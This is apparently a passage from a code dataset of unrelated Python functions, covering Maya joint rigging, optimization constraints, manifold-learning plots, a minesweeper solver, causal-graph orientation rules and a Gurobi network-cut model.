cutlineset.append([[0.0+globalconfig.CUTLINE_X_OFFSET,globalconfig.Y_BLANK+line*(globalconfig.Y_LENGTH/globalconfig.CENTER_RATIO)+globalconfig.CUTLINE_Y_OFFSET],[-3.0+globalconfig.CUTLINE_X_OFFSET,globalconfig.Y_BLANK+line*(globalconfig.Y_LENGTH/globalconfig.CENTER_RATIO)+globalconfig.CUTLINE_Y_OFFSET]])\r\n cutlineset.append([[171.68+globalconfig.CUTLINE_X_OFFSET,globalconfig.Y_BLANK+line*(globalconfig.Y_LENGTH/globalconfig.CENTER_RATIO)+globalconfig.CUTLINE_Y_OFFSET],[174.68+globalconfig.CUTLINE_X_OFFSET,globalconfig.Y_BLANK+line*(globalconfig.Y_LENGTH/globalconfig.CENTER_RATIO)+globalconfig.CUTLINE_Y_OFFSET]])\r\n return cutlineset", "def skeleton_duplicateJoint(self,sourceJoints = None, modifier = 'rig', connectToModule = False, connectAs = 'rigJoints', connectToSource = 'skinJoint', singleMode = False, cgmType = None, indices = [],blockNames=False):\n _str_func = 'skeleton_buildDuplicateChain'\n \n \n if indices:\n log.debug(\"|{0}| >> Indices arg: {1}\".format(_str_func, indices)) \n l_buffer = []\n for i in indices:\n l_buffer.append(sourceJoints[i])\n sourceJoints = l_buffer \n \n ml_source = cgmMeta.validateObjListArg(sourceJoints,mayaType=['joint'],noneValid=False)\n \n if connectToModule:\n #mRigNull = self.moduleTarget.rigNull\n \n #Get our segment joints\n if singleMode:\n l_jointsExist = connectToModule.getMessage(connectAs)\n else:\n l_jointsExist = connectToModule.msgList_get(connectAs,asMeta = False, cull = True)\n \n if l_jointsExist:\n log.debug(\"|{0}| >> Deleting existing {1} chain\".format(_str_func, modifier)) \n mc.delete(l_jointsExist)\n\n l_joints = mc.duplicate([i_jnt.mNode for i_jnt in ml_source],po=True,ic=True,rc=True)\n \n ml_joints = [cgmMeta.cgmObject(j) for j in l_joints]\n\n if blockNames:\n l_names = skeleton_getNameDicts(self,False,len(l_joints)) \n else:\n l_names = []\n \n for i,mJnt in enumerate(ml_joints):\n if blockNames:\n _d_tmp = l_names[i]\n log.debug(\"|{0}| >> blockName dict {1} | {2}\".format(_str_func, i,_d_tmp)) \n for a in ['cgmIterator','cgmName']:\n if _d_tmp.get(a):\n mJnt.addAttr(a, str(_d_tmp.get(a)),attrType='string',lock=True)\n\n if modifier is not None:\n #l_names[i]['cgmTypeModifier'] = modifier\n mJnt.addAttr('cgmTypeModifier', modifier,attrType='string',lock=True)\n if cgmType is not None:\n #l_names[i]['cgmType'] = cgmType \n mJnt.addAttr('cgmType', cgmType,attrType='string',lock=True)\n \n #l_joints[i] = mJnt.mNode\n if connectToSource:\n mJnt.connectChildNode(ml_joints[i].mNode,connectToSource,'{0}Joint'.format(modifier))#Connect\n \n if mJnt.hasAttr('scaleJoint'):\n if mJnt.scaleJoint in ml_skinJoints:\n int_index = ml_source.index(mJnt.scaleJoint)\n mJnt.connectChildNode(ml_source[int_index],'scaleJoint','sourceJoint')#Connect\n\n #Name loop\n ml_joints[0].parent = False\n for i,mJnt in enumerate(ml_joints):\n #mJnt.rename(NAMETOOLS.returnCombinedNameFromDict(l_names[i]))\n mJnt.doName()\t\n \n if connectToModule:\n if singleMode:\n connectToModule.connectChildNode(ml_joints[0],connectAs,'rigNull')\n else:\n connectToModule.msgList_connect(connectAs, ml_joints,'rigNull')#connect\t\n return ml_joints", "def SpacingConstraint(turbineX, turbineY, rotorDiameter, minSpacing=2.0):\n nTurbines = len(rotorDiameter)\n separation_squared = turbineSpacingSquared(turbineX, turbineY)\n spacing_con = np.zeros(int((nTurbines-1)*nTurbines/2))\n\n k = 0\n for i in range(0, nTurbines):\n for j in range(i+1, nTurbines):\n spacing_con[k] = separation_squared[k] - (0.5*minSpacing*rotorDiameter[i]+0.5*minSpacing*rotorDiameter[j])**2\n k += 1\n return spacing_con", "def hedge_maker(tail_width, head_width, node_ls, self_loops):\n tail_set = set()\n head_set = set()\n\n tail_full = False\n head_full = False\n \n while tail_full == False: \n selection = random.choice(node_ls)\n tail_set.add(selection)\n if len(tail_set) == tail_width:\n tail_full = True\n\n\n\n \n while head_full == False:\n selection = random.choice(node_ls)\n\n if self_loops == True: #if we don't want self loops, this checks to make sure the selection isn't one of the tail nodes\n head_set.add(selection)\n else: \n if selection not in tail_set:\n head_set.add(selection)\n\n if len(head_set) == head_width:\n head_full = True\n\n frozen_head = frozenset(head_set)\n frozen_tail = frozenset(tail_set)\n \n return (frozen_tail, frozen_head) #returns as a tuple of frozensets so that it will only be added to the edge_set if it's a unique edge", "def generate_connectivity_constraint(problem, b_list, add_S):\n\n # Constructing A_iq and b_iq for inequality (38) for all S in add_S as sp.coo matrix\n A_iq_row = []\n A_iq_col = []\n A_iq_data = []\n\n constraint_idx = 0\n # For each base\n for b, S_v_t in product(b_list, add_S):\n pre_S_transition = problem.graph.pre_tran_vt(S_v_t)\n pre_S_connectivity = problem.graph.pre_conn_vt(S_v_t)\n for v, t in S_v_t:\n # add y\n A_iq_row.append(constraint_idx)\n A_iq_col.append(problem.get_yb_idx(b, v, t))\n A_iq_data.append(1)\n for v0, v1, t0 in pre_S_transition:\n A_iq_row.append(constraint_idx)\n A_iq_col.append(problem.get_x_idx(b, v0, v1, t0))\n A_iq_data.append(-1)\n for v0, v1, t1 in pre_S_connectivity:\n A_iq_row.append(constraint_idx)\n A_iq_col.append(problem.get_xbar_idx(b, v0, v1, t1))\n A_iq_data.append(-1)\n constraint_idx += 1\n A_iq_38 = sp.coo_matrix(\n (A_iq_data, (A_iq_row, A_iq_col)), shape=(constraint_idx, problem.num_vars)\n )\n\n return Constraint(A_iq=A_iq_38, b_iq=np.zeros(constraint_idx))", "def create_plaquette(self, baseStr, fidpairs):\n ji_list = list(_itertools.product(list(range(self.nMinorRows)),\n list(range(self.nMinorCols))))\n assert(len(ji_list) >= len(fidpairs)), \"Number of minor rows/cols is too small!\"\n\n elements = [(j, i, prepStr + baseStr + effectStr)\n for (j, i), (prepStr, effectStr) in\n zip(ji_list[0:len(fidpairs)], fidpairs)] # note preps are *cols* not rows\n\n return CircuitPlaquette(baseStr, self.nMinorRows,\n self.nMinorCols, elements,\n self.aliases, fidpairs[:])", "def _grow_polygon_points(pts,growth):\n \n min_x1 = 0 # Initialize smallest x to 1st point\n min_x2 = 1 # Initialize second smallest x to 2nd point\n if pts[min_x2][0] < pts[min_x1][0]: # Swap if assumption was incorrect\n min_x1 = 1\n min_x2 = 0\n min_y1 = 0 # Initialize smallest y to 1st point\n min_y2 = 1 # Initialize second smallest y to 2nd point\n if pts[min_y2][1] < pts[min_y1][1]: # Swap if assumption was incorrect\n min_y1 = 1\n min_y2 = 0\n for i in range(2,len(pts)): # For other 2 points\n if pts[i][0] < pts[min_x2][0]: # Point is less than 2nd smallest\n if pts[i][0] < pts[min_x1][0]: # Point is also less than 1st smallest\n min_x2 = min_x1\n min_x1 = i\n else:\n min_x2 = i\n if pts[i][1] < pts[min_y2][1]:\n if pts[i][1] < pts[min_y1][1]:\n min_y2 = min_y1\n min_y1 = i\n else:\n min_y2 = i\n print\n print pts\n print \"min_x1: \" + str(min_x1) \n print \"min_x2: \" + str(min_x2) \n print \"min_y1: \" + str(min_y1) \n print \"min_y2: \" + str(min_y2) \n for i in range(len(pts)): # For each point\n if i == min_x1 or i == min_x2: # x is minimum, shrink\n pts[i] = (pts[i][0] - growth, pts[i][1])\n else: # x is maximum, grow\n pts[i] = (pts[i][0] + growth, pts[i][1])\n if i == min_y1 or i == min_y2: # y is minimum, shrink\n pts[i] = (pts[i][0], pts[i][1] - growth) \n else: # y is maximum, grow\n pts[i] = (pts[i][0], pts[i][1] + growth)", "def create_constraints(self, courses):\n for i, course1 in enumerate(courses):\n for j, course2 in enumerate(courses):\n if i <= j:\n continue\n self.p.add_constraint(section_constraint, [course1, course2])\n self.p.add_constraint(self.time_conflict, [course1])", "def _make_simple_partition_label(chain_dict):\n\n cps = chain_dict['chainParts']\n if not (_select_simple_chainparts(cps)):\n raise NotImplementedError(\n 'chain fails substring selection: not \"simple\": %s' % (\n chain_dict['chainName']))\n \n label = 'simplepartition(['\n for cp in cps:\n smcstr = str(cp['smc'])\n if smcstr == 'nosmc':\n smcstr = ''\n for i in range(int(cp['multiplicity'])):\n # condition_str = '(%set,%s,%s)' % (str(cp['threshold']),\n # str(cp['etaRange']),\n # smcstr,)\n condition_str = '(%set,%s' % (str(cp['threshold']),\n str(cp['etaRange']),)\n if smcstr:\n condition_str += ',%s)'\n else:\n condition_str += ')'\n label += condition_str\n label += '])'\n return label", "def buildWrist(wrist_ctrl=None, wrist_jnt=None, fingeramount=5, rot_ax=\"Y\"):\n selection = mc.ls(sl=True)\n\n if not selection and (not wrist_jnt or not wrist_ctrl):\n print \"Please select the wrist joint then the wrist controller\"\n return\n if not wrist_ctrl:\n wrist_ctrl = selection[1]\n if not wrist_jnt:\n wrist_jnt = selection[0]\n\n mc.parentConstraint(wrist_jnt, wrist_ctrl, mo=True)\n\n finger_jnts = mc.listRelatives(wrist_jnt, allDescendents=True)\n numfinger_jnts = len(finger_jnts)/fingeramount\n\n print \"fingeramount: \", fingeramount\n for i in range(fingeramount):\n\n singlefinger_jnts = finger_jnts[(numfinger_jnts * i): numfinger_jnts * (i+1)]\n singlefinger_jnts.reverse()\n singlefinger_jnts.pop()\n attrname = getAttrName(singlefinger_jnts[0])\n mc.addAttr(wrist_ctrl, longName=attrname, attributeType=\"float\", keyable=True)\n\n print \"singlefinger_jnts \", singlefinger_jnts\n\n fk_ctrls = FKChain.buildFKChain(fk_joints=singlefinger_jnts, ctrl_scale=0.5, keyword=\"jnt\", createXtra_grp=True)\n\n print \"FK Controllers: \", fk_ctrls\n\n outergrp = \"\"\n\n for j, fk in enumerate(fk_ctrls):\n ctrlgrp = mc.listRelatives(fk, parent=True)[0]\n\n if j == 0:\n temp = mc.listRelatives(ctrlgrp, parent=True)[0]\n outergrp = temp\n mc.connectAttr(\"%s.%s\"%(wrist_ctrl, attrname), \"%s.rotate%s\"%(ctrlgrp, rot_ax))\n\n print \"outer grp\", outergrp\n print \"wrist_ctrl\", wrist_ctrl\n\n mc.parent(outergrp, wrist_ctrl)", "def init_constraint_list(self):\n constraints = []\n for row, equ_val, rhs_val in \\\n zip(self.matrix, self.equ_vec, self.rhs_vec):\n\n constraints.append({'type': self.get_eq_type(equ_val),\n 'fun': lambda x: rhs_val - np.dot(row, x)})\n\n bounds = Bounds(self.low_bounds, self.upper_bounds)\n\n return constraints, bounds", "def glow_boundary(bound):\n assert bound < 4\n global layout\n temp = len(layout) - 1\n for i in range(bound, bound + len_square(bound)):\n for j in range(bound, bound + len_square(bound)): # TODO: assign this to a variable\t\n layout[i][j] = 1", "def SwissRollWithConstrain(nei = [5,25,50]):\n n_samples = 4000\n n_neighbor = 60\n noise = 0\n X, _ = make_swiss_roll(n_samples, noise=noise, random_state=42)\n X = X*2 #scaling ths Swiss\n\n neigh = NearestNeighbors(n_neighbors=n_neighbor).fit(X)\n _, indxes = neigh.kneighbors(X)\n\n SwissConstrain = np.delete(X,indxes[1500,:], axis=0)\n SwissConstrainNoisy = SwissConstrain + np.random.normal(0,1,[n_samples-n_neighbor,3])\n\n elevation = 10\n azimoth = 60\n fig = plt.figure(figsize=(21,7))\n ax1 = fig.add_subplot(131, projection='3d')\n ax1.set_zlim(-30, 30)\n ax1.scatter(X[:, 0], X[:, 1], X[:, 2], c=np.linalg.norm((X[:, 0], X[:, 1]), axis=0))\n ax1.set_title('Swiss Roll')\n ax1.view_init(elev=elevation, azim=azimoth)\n ax1 = fig.add_subplot(132, projection='3d')\n ax1.set_zlim(-30, 30)\n ax1.scatter(SwissConstrain[:, 0], SwissConstrain[:, 1], SwissConstrain[:, 2],\n c=np.linalg.norm((SwissConstrain[:, 0], SwissConstrain[:, 1]), axis=0))\n ax1.set_title('Swiss Roll with constrain')\n ax1.view_init(elev=elevation, azim=azimoth)\n ax1 = fig.add_subplot(133, projection='3d')\n ax1.set_zlim(-30, 30)\n ax1.scatter(SwissConstrainNoisy[:, 0], SwissConstrainNoisy[:, 1], SwissConstrainNoisy[:, 2],\n c=np.linalg.norm((SwissConstrainNoisy[:, 0], SwissConstrainNoisy[:, 1]), axis=0))\n ax1.set_title('Noisy Swiss Roll with constrain')\n ax1.view_init(elev=elevation, azim=azimoth)\n plt.savefig('Swiss Roll with different petubations')\n\n DataToPlot = [X,SwissConstrain,SwissConstrainNoisy]\n DataName = ['Swiss ISOMAP','Swiss with constrain ISOMAP', 'Swiss with constrain and noise ISOMAP']\n\n # Ploting Swiss Isomapping\n for neighbors in nei:\n fig = plt.figure(figsize=(30, 10))\n for i, j in enumerate(DataToPlot):\n Swiss_isomap = Isomap(j, 2, neighbors)\n method = DataName[i]\n ax = fig.add_subplot(1, len(DataToPlot), i + 1)\n ax.scatter(Swiss_isomap[:, 0], Swiss_isomap[:, 1],\n c=np.linalg.norm((Swiss_isomap[:, 0], Swiss_isomap[:, 1]), axis=0), cmap=plt.cm.Spectral)\n ax.set_title('{} with {} Neighbours'.format(method, neighbors))\n # making_plot(Swiss_isomap, pallete=Swiss_isomap[:, 0:1], neighbors=neighbors, method=method) #An option to plot single graphs\n plt.savefig('Swiss ISOMAP embbeding for {} neighbour'.format(neighbors))\n\n DataName = ['Swiss LLE', 'Swiss with constrain LLE', 'Swiss with constrain and noise LLE']\n # Ploting Swiss LLE\n for neighbors in nei:\n fig = plt.figure(figsize=(30, 10))\n for i, j in enumerate(DataToPlot):\n Swiss_LLE = LLE(j, 2, neighbors)\n method = DataName[i]\n ax = fig.add_subplot(1, len(DataToPlot), i + 1)\n ax.scatter(Swiss_LLE[:, 0], Swiss_LLE[:, 1],\n c=np.linalg.norm((Swiss_LLE[:, 0], Swiss_LLE[:, 1]), axis=0), cmap=plt.cm.Spectral)\n ax.set_title('{} with {} Neighbours'.format(method, neighbors))\n # making_plot(Swiss_LLE, pallete=Swiss_LLE[:, 0:1], neighbors=neighbors, method=method) #An option to plot single graphs\n plt.savefig('Swiss LLE embbeding for {} neighbour'.format(neighbors))\n return", "def _constraints_utility(self):\n\n def rule(model):\n total = summation(self.utilities, model.A)\n return model.A_total == total\n\n self.model.constrain_A_total = Constraint(rule=rule)\n\n def rule(model):\n total = 2 * summation(self.utilities, model.A2)\n return model.A2_total == total\n\n self.model.constrain_A2_total = Constraint(rule=rule)\n\n def rule(model):\n total = 3 * summation(self.utilities, model.A3)\n return model.A3_total == total\n\n self.model.constrain_A3_total = Constraint(rule=rule)\n\n def rule(model):\n total = 4 * summation(self.utilities, model.A4)\n return model.A4_total == total\n\n self.model.constrain_A4_total = Constraint(rule=rule)\n\n def rule(model):\n completion_bonus = self.task_completion_bonus * self.task_duration\n total = summation(completion_bonus, model.T_total)\n return model.Completion_total == total\n\n self.model.constrain_completion_total = Constraint(rule=rule)\n\n def rule(model):\n scaling = 0.2\n affinity = np.outer(c.AFFINITY_COGNITIVE, self.task_cognitive_load)\n\n # TODO(cathywu) replace this code when \"simple slicing\" is clarified\n zeros1 = np.zeros((1, self.num_tasks))\n zeros2 = np.zeros((2, self.num_tasks))\n zeros3 = np.zeros((3, self.num_tasks))\n\n total = summation(affinity, model.A)\n total += summation(affinity, model.A2)\n total += summation(affinity, model.A3)\n total += summation(affinity, model.A4)\n\n total += summation(np.vstack((affinity[1:, :], zeros1)), model.A2)\n total += summation(np.vstack((affinity[1:, :], zeros1)), model.A3)\n total += summation(np.vstack((affinity[1:, :], zeros1)), model.A4)\n\n total += summation(np.vstack((affinity[2:, :], zeros2)), model.A3)\n total += summation(np.vstack((affinity[2:, :], zeros2)), model.A4)\n\n total += summation(np.vstack((affinity[3:, :], zeros3)), model.A4)\n total *= scaling\n\n return model.Affinity_cognitive_total == total\n\n self.model.constrain_affinity_cognitive_total = Constraint(rule=rule)", "def W_joint_chain(self, joint_name):\n if self.joint_syms[joint_name].get(\"W\") is None:\n # go up the parent chain of transformations\n parent_joint_name = self.global_syms[\"Jname2parentJname\"].get(\n joint_name)\n if parent_joint_name is None:\n self.joint_syms[joint_name][\"W\"] = \\\n self.joint_syms[joint_name][\"q_rpy\"]\n else:\n self.joint_syms[joint_name][\"W\"] = (\n self.W_joint_chain(parent_joint_name)\n + self.joint_syms[joint_name][\"q_rpy\"]\n )\n return self.joint_syms[joint_name][\"W\"]", "def _set_starting_point_embedding(\n self,\n basis: str = None,\n borders: tuple = None,\n ) -> None:\n # check that the basis is present\n bindices = []\n if 'X_'+basis not in self.adata.obsm.keys():\n raise ValueError(\n 'X_%s is not an embedding in `.adata.obsm`.' % basis)\n embed = self.vadata.obsm['X_'+basis]\n\n # get all cells within the borders specified along each dimension\n for i, min_max in enumerate(borders):\n bidx = np.logical_and(\n embed[:, i] > min_max[0],\n embed[:, i] < min_max[1],\n )\n bindices.append(bidx)\n\n # use cells that meet all border criteria as starting points\n bidx = np.logical_and.reduce(bindices)\n self.starting_points = self.pfield[bidx, :]\n return", "def constrain(obj_dict):\n\n point_set = set()\n for obj in obj_dict['point'].values():\n if obj.x is None and obj.y is None:\n if obj.random is True:\n obj.x = random.uniform(-1, 1)\n obj.y = random.uniform(-1, 1)\n else:\n point_set.add(obj)\n\n i = 0\n points = [y for y in point_set]\n\n old_len = None\n\n while points:\n if i == len(points):\n # Ensure that something has changed\n if old_len == len(points):\n p = final_check(points)\n if p is None:\n # If nothing has changed, error out\n error(name=\"Underconstrained system\",\n msg=\"Unable to place the following points: \" +\n str([x.name for x in points]))\n else:\n points.remove(p)\n i = 0\n continue\n # Modular arithmetic\n old_len = len(points)\n i = 0\n # Get the current point\n p = points[i]\n\n # If there are no constraints on the point, generate it randomly\n if len(p.constraints) == 0:\n p.x = random.uniform(-1, 1)\n p.y = random.uniform(-1, 1)\n points.remove(p)\n i = 0\n continue\n # If there is one constraint on the point, we can plcae it anywhere\n # on the constraint\n elif len(p.constraints) == 1:\n obj = list(p.constraints)[0]\n # Check the symify constraint because of the fact that arbitrary\n # point calls it\n if obj is None or obj.symify() is None:\n i += 1\n continue\n\n p.x, p.y = obj.arbitrary_point()\n\n # Start the iteration over\n i = 0\n points.remove(p)\n # Otherwise, there are multiple constraints\n else:\n symified_constraints = []\n # Get all of the constraints that we have processed and given\n # locations to\n for x in p.constraints:\n tmp = x.symify()\n if tmp is not None:\n symified_constraints.append(tmp)\n # Ensure that we have at least two constraints\n # (to define an intersection); if not go to the next point\n if len(symified_constraints) < 2:\n i += 1\n continue\n # Compute the intersection\n intersection = sympy.intersection(*symified_constraints)\n\n # If there was no intersection, continue\n if intersection == []:\n i += 1\n continue\n # Otherwise, we have a list of possible intersections, pick\n # one of them randomly to use\n else:\n r = random.randint(0, len(intersection) - 1)\n p.x = float(intersection[r].x)\n p.y = float(intersection[r].y)\n i = 0\n points.remove(p)", "def _make_ties(self) -> None:\n\n # get all hint spaces with adjacent '?'s\n frontier = {neighbor: self._lookup[neighbor] for pos, space in self._unknowns.items() for neighbor in\n space.neighbors.values() if neighbor and self._lookup[neighbor].hint.isnumeric()}\n\n # use hints to create \"zones\" of '?'-squares along the frontier,\n # detailing the # of mines left to find in each zone.\n for pos, space in frontier.items():\n local_unknowns = {coord for coord in space.neighbors.values() if coord in self._unknowns}\n for unknown in local_unknowns:\n key = frozenset(local_unknowns)\n self._lookup[unknown].zones[key] = self._lookup[unknown].zones.setdefault(key, space.num_undiscovered)\n self._lookup[unknown].zones[key] = min(space.num_undiscovered, self._lookup[unknown].zones[key])\n self._lookup[unknown].ties |= local_unknowns - {unknown}\n self._remaining_zones.update(self._lookup[unknown].zones)\n\n # split overlapping zones into components\n for unknown in self._unknowns.values():\n for zone, num_undiscovered in list(unknown.zones.items()):\n if zone not in unknown.zones:\n continue\n for other_zone, other_num_undiscovered in list(unknown.zones.items()):\n if other_zone in unknown.zones:\n shared = zone & other_zone\n\n if zone < other_zone or (shared and other_num_undiscovered > num_undiscovered):\n # if \"zone\" & \"other_zone\" share members then\n # it is possible to split the zone w/ the higher # of mines\n # into components, \"shared\" & \"not_shared\".\n\n # unknown.zones.pop(other_zone)\n\n not_shared = other_zone - shared\n unknown.zones[not_shared] = other_num_undiscovered - num_undiscovered\n else:\n print(end='')\n return", "def orient(skeleton, sep_set):\n\n def _rule_1(cpdag):\n \"\"\"Rule_1\n\n Orient i——j into i——>j whenever there is an arrow k——>i\n such that k and j are nonadjacent.\n \"\"\"\n\n columns = list(range(cpdag.shape[1]))\n ind = list(combinations(columns, 2))\n for ij in sorted(ind, key=lambda x: (x[1], x[0])):\n # Iteration every (i, j)\n i, j = ij\n if cpdag[i, j] * cpdag[j, i] == 0:\n continue\n # search i——j\n else:\n all_k = [x for x in columns if x not in ij]\n for k in all_k:\n if cpdag[k, i] == 1 and cpdag[i, k] == 0 \\\n and cpdag[k, j] + cpdag[j, k] == 0:\n cpdag[j, i] = 0\n return cpdag\n\n def _rule_2(cpdag):\n \"\"\"Rule_2\n\n Orient i——j into i——>j whenever there is a chain i——>k——>j.\n \"\"\"\n\n columns = list(range(cpdag.shape[1]))\n ind = list(combinations(columns, 2))\n for ij in sorted(ind, key=lambda x: (x[1], x[0])):\n # Iteration every (i, j)\n i, j = ij\n if cpdag[i, j] * cpdag[j, i] == 0:\n continue\n # search i——j\n else:\n all_k = [x for x in columns if x not in ij]\n for k in all_k:\n if cpdag[i, k] == 1 and cpdag[k, i] == 0 \\\n and cpdag[k, j] == 1 \\\n and cpdag[j, k] == 0:\n cpdag[j, i] = 0\n return cpdag\n\n def _rule_3(cpdag, sep_set=None):\n \"\"\"Rule_3\n\n Orient i——j into i——>j\n whenever there are two chains i——k——>j and i——l——>j\n such that k and l are non-adjacent.\n \"\"\"\n\n columns = list(range(cpdag.shape[1]))\n ind = list(combinations(columns, 2))\n for ij in sorted(ind, key=lambda x: (x[1], x[0])):\n # Iteration every (i, j)\n i, j = ij\n if cpdag[i, j] * cpdag[j, i] == 0:\n continue\n # search i——j\n else:\n for kl in sep_set.keys(): # k and l are nonadjacent.\n k, l = kl\n # if i——k——>j and i——l——>j\n if cpdag[i, k] == 1 \\\n and cpdag[k, i] == 1 \\\n and cpdag[k, j] == 1 \\\n and cpdag[j, k] == 0 \\\n and cpdag[i, l] == 1 \\\n and cpdag[l, i] == 1 \\\n and cpdag[l, j] == 1 \\\n and cpdag[j, l] == 0:\n cpdag[j, i] = 0\n return cpdag\n\n def _rule_4(cpdag, sep_set=None):\n \"\"\"Rule_4\n\n Orient i——j into i——>j\n whenever there are two chains i——k——>l and k——>l——>j\n such that k and j are non-adjacent.\n \"\"\"\n\n columns = list(range(cpdag.shape[1]))\n ind = list(combinations(columns, 2))\n for ij in sorted(ind, key=lambda x: (x[1], x[0])):\n # Iteration every (i, j)\n i, j = ij\n if cpdag[i, j] * cpdag[j, i] == 0:\n continue\n # search i——j\n else:\n for kj in sep_set.keys(): # k and j are nonadjacent.\n if j not in kj:\n continue\n else:\n kj = list(kj)\n kj.remove(j)\n k = kj[0]\n ls = [x for x in columns if x not in [i, j, k]]\n for l in ls:\n if cpdag[k, l] == 1 \\\n and cpdag[l, k] == 0 \\\n and cpdag[i, k] == 1 \\\n and cpdag[k, i] == 1 \\\n and cpdag[l, j] == 1 \\\n and cpdag[j, l] == 0:\n cpdag[j, i] = 0\n return cpdag\n\n columns = list(range(skeleton.shape[1]))\n cpdag = deepcopy(skeleton)\n # pre-processing\n for ij in sep_set.keys():\n i, j = ij\n all_k = [x for x in columns if x not in ij]\n for k in all_k:\n if cpdag[i, k] + cpdag[k, i] != 0 \\\n and cpdag[k, j] + cpdag[j, k] != 0:\n if k not in sep_set[ij]:\n if cpdag[i, k] + cpdag[k, i] == 2:\n cpdag[k, i] = 0\n if cpdag[j, k] + cpdag[k, j] == 2:\n cpdag[k, j] = 0\n cpdag = _rule_1(cpdag=cpdag)\n cpdag = _rule_2(cpdag=cpdag)\n cpdag = _rule_3(cpdag=cpdag, sep_set=sep_set)\n cpdag = _rule_4(cpdag=cpdag, sep_set=sep_set)\n\n return cpdag", "def center_flows(L_wprime, U_wprime, L_w3, U_w3, L_overlap, U_overlap):\n # examine every possible point\n current_dist_to_edge = -1\n point = (0,0)\n #print(\"w3 range: [{}, {}]\".format(L_w3, U_w3))\n #print(\"w' range: [{}, {}]\".format(L_wprime, U_wprime))\n #print(\"overlap range: [{},{}]\".format(L_overlap, U_overlap))\n for y in range(L_w3, U_w3 + 1):\n #print(\"y={}\".format(y))\n LH_bound = max(L_wprime, L_overlap - y)\n #print(\"LH bound = {}\".format(LH_bound))\n RH_bound = min(U_wprime, U_overlap - y)\n #print(\"RH bound = {}\".format(RH_bound))\n for x in range(LH_bound, RH_bound + 1):\n # w3 UB: 0x + 1y - U_w3 = 0\n # w3 LB: 0x + 1y - L_w3 = 0\n # wprime UB: 1x + 0y - U_wprime\n # wprime LB: 1x + 0y - L_wprime\n # wprime + w3 UB: 1x + 1y - U_wprime,wk\n # wprime + w3 LB: 1x + 1y - L_wprime,wk\n dist_to_edge = min(distance_point_to_line(x, y, 0, -1, U_w3), #0x-1y+U_w3=0\n distance_point_to_line(x, y, 0, -1, L_w3), #0x-1y+L_w3=0\n # -1x + 0y + U_wprime = 0\n distance_point_to_line(x, y, -1, 0, U_wprime),\n # -1x + 0y + L_wprime = 0\n distance_point_to_line(x, y, -1, 0, L_wprime),\n # -1x - 1y + U_overlap = 0\n distance_point_to_line(x, y, -1, -1, U_overlap),\n # -1 x - y + L_overlap = 0\n distance_point_to_line(x, y, -1, -1, L_overlap))\n if dist_to_edge > current_dist_to_edge:\n #print(\"At point ({},{}), distance to edge increased from {} to {}.\"\\\n # .format(x,y,current_dist_to_edge,dist_to_edge))\n current_dist_to_edge = dist_to_edge\n point = (x,y)\n return(point)", "def setup_fitting_init_pars(inparam, night, band, masterbeam, order):\n\n # Determine whether IGRINS mounting was loose or\n # the night of interest is in question\n if (int(night) < 20180401) or (int(night) > 20190531):\n IPpars = inparam.ips_tightmount_pars[band][masterbeam][order]\n else:\n IPpars = inparam.ips_loosemount_pars[band][masterbeam][order]\n\n # start at bucket loc = 1250 +- 100, width = 250 +- 100,\n # depth = 100 +- 5000 but floor at 0\n centerloc = 1250 if band == 'H' else 1180\n\n # Initialize parameter array for optimization as well as half-range values\n # for each parameter during the various steps of the optimization.\n # Many of the parameters initialized here will be changed throughout the\n # code before optimization and in between optimization steps.\n\n parA0 = np.array([\n 0.0, # 0: The shift of the stellar template (km/s)\n 0.0, # 1: The scale factor for the stellar template\n 0.0, # 2: The shift of the telluric template (km/s)\n 1.0, # 3: The scale factor for the telluric template\n 0.0, # 4: vsini (km/s)\n IPpars[2], # 5: The instrumental resolution (FWHM) in pixels\n 0.0, # 6: Wavelength 0-pt\n 0.0, # 7: Wavelength linear component\n 0.0, # 8: Wavelength quadratic component\n 0.0, # 9: Wavelength cubic component\n 1.0, #10: Continuum zero point\n 0.0, #11: Continuum linear component\n 0.0, #12: Continuum quadratic component\n IPpars[1], #13: Instrumental resolution linear component\n IPpars[0], #14: Instrumental resolution quadratic component\n centerloc, #15: Blaze dip center location\n 330, #16: Blaze dip full width\n 0.05, #17: Blaze dip depth\n 90, #18: Secondary blaze dip full width\n 0.05, #19: Blaze dip depth\n 0.0, #20: Continuum cubic component\n 0.0, #21: Continuum quartic component\n 0.0, #22: Continuum quintic component\n 0.0, #23: Continuum hexic component\n 0.0, #24: secondary par\n 0.0, #25: secondary par\n 0.0, #26: secondary par\n 0.0 #27: secondary par\n ])\n\n return parA0", "def get_GNS_cut(self):\n # we build the optimization around the casted digraph instead of multidigraph\n # for simplicity\n G = self.base_digraph\n s_1 = self.sources[0]\n s_2 = self.sources[1]\n t_1 = self.destinations[0]\n t_2 = self.destinations[1]\n edges = G.edges()\n nodes = G.nodes()\n\n try:\n\n # Great an gurobi instance of the optimization model\n m = Model(\"GNS\")\n m.setParam('OutputFlag', False)\n\n x_v = {}\n # vertex variables for s_1, t_1 cut\n for v in nodes:\n x_v[v] = m.addVar(vtype=GRB.BINARY)\n\n x_e = {}\n # edge variables for s_1, t_1 cut\n for (u,v) in edges:\n x_e[u,v] = m.addVar(vtype=GRB.BINARY)\n\n y_v = {}\n # vertex variables for s_2, t_2 cut\n for v in nodes:\n y_v[v] = m.addVar(vtype=GRB.BINARY)\n\n y_e = {}\n # edge variables for s_2, t_2 cut\n for (u,v) in edges:\n y_e[u,v] = m.addVar(vtype=GRB.BINARY)\n\n z_v = {}\n # vertex variables for s_2, t_1 cut\n for v in nodes:\n z_v[v] = m.addVar(vtype=GRB.BINARY)\n\n z_e = {}\n # edge variables for s_2, t_1 cut\n for (u,v) in edges:\n z_e[u,v] = m.addVar(vtype=GRB.BINARY)\n\n e = {}\n # GNS indicator variable\n for (u,v) in edges:\n e[u,v] = m.addVar(vtype=GRB.BINARY, obj=G[u][v]['capacity'])\n\n # Done with decision variable creation\n # update model\n m.update()\n\n # Constraints\n # 1. Constraints for s_1 - t_1 cut\n for (u,v) in edges:\n if (u,v) == (s_1, t_1):\n m.addConstr(x_e[u,v] >= 1)\n elif u == s_1:\n m.addConstr(x_v[v] + x_e[u,v] >= 1)\n elif v == t_1:\n m.addConstr(-x_v[u] + x_e[u,v] >= 0)\n else:\n m.addConstr(x_v[v] - x_v[u] + x_e[u,v] >= 0)\n\n # 2. Constraints for s_2 - t_2 cut\n for (u,v) in edges:\n if (u,v) == (s_2, t_2):\n m.addConstr(y_e[u,v] >= 1)\n elif u == s_2:\n m.addConstr(y_v[v] + y_e[u,v] >= 1)\n elif v == t_2:\n m.addConstr(-y_v[u] + y_e[u,v] >= 0)\n else:\n m.addConstr(y_v[v] - y_v[u] + y_e[u,v] >= 0)\n\n # 3. Constraints for s_2 - t_1 cut\n 